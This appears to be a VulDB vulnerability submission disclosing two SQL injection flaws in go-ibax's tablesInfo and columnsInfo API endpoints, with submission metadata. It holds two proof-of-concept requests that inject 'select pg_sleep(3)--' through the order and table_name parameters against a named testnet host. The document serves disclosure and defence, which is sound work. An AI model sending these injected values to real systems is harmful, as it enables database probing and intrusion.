إرسال #50341: SQL Injection vulnerabilities in go-ibax via order,table_name parameterالمعلومات

عنوانSQL Injection vulnerabilities in go-ibax via order,table_name parameter
الوصفThere are two SQL injection vulnerabilities. POC: POST https://testnet-hk1.ibax.network:5079/api/v2/open/tablesInfo data: page=1&limit=1&order=1; select pg_sleep(3)-- POC: POST https://testnet-hk1.ibax.network:5079/api/v2/open/columnsInfo data: table_name=1; select pg_sleep(3)-- ![](https://user-images.githubusercontent.com/116059491/196356476-e7caa9f3-348f-4f9c-bdf1-4298ec81afee.jpeg) Reported by Tom(@Tomy) from QSec-Team of Cyber Security Department at Qi'anxin Group on 2022-11-01
المصدر⚠️ https://github.com/IBAX-io/go-ibax/issues/2060
المستخدم
 Tomy (UID 34751)
ارسال01/11/2022 12:36 PM (4 سنوات منذ)
الاعتدال01/11/2022 04:38 PM (4 hours later)
الحالةتمت الموافقة
إدخال VulDB212634 [IBAX go-ibax /api/v2/open/tablesInfo حقن SQL]
النقاط20

التالي نظرة عامة السابق

Are you interested in using VulDB?

Download the whitepaper to learn more about our service!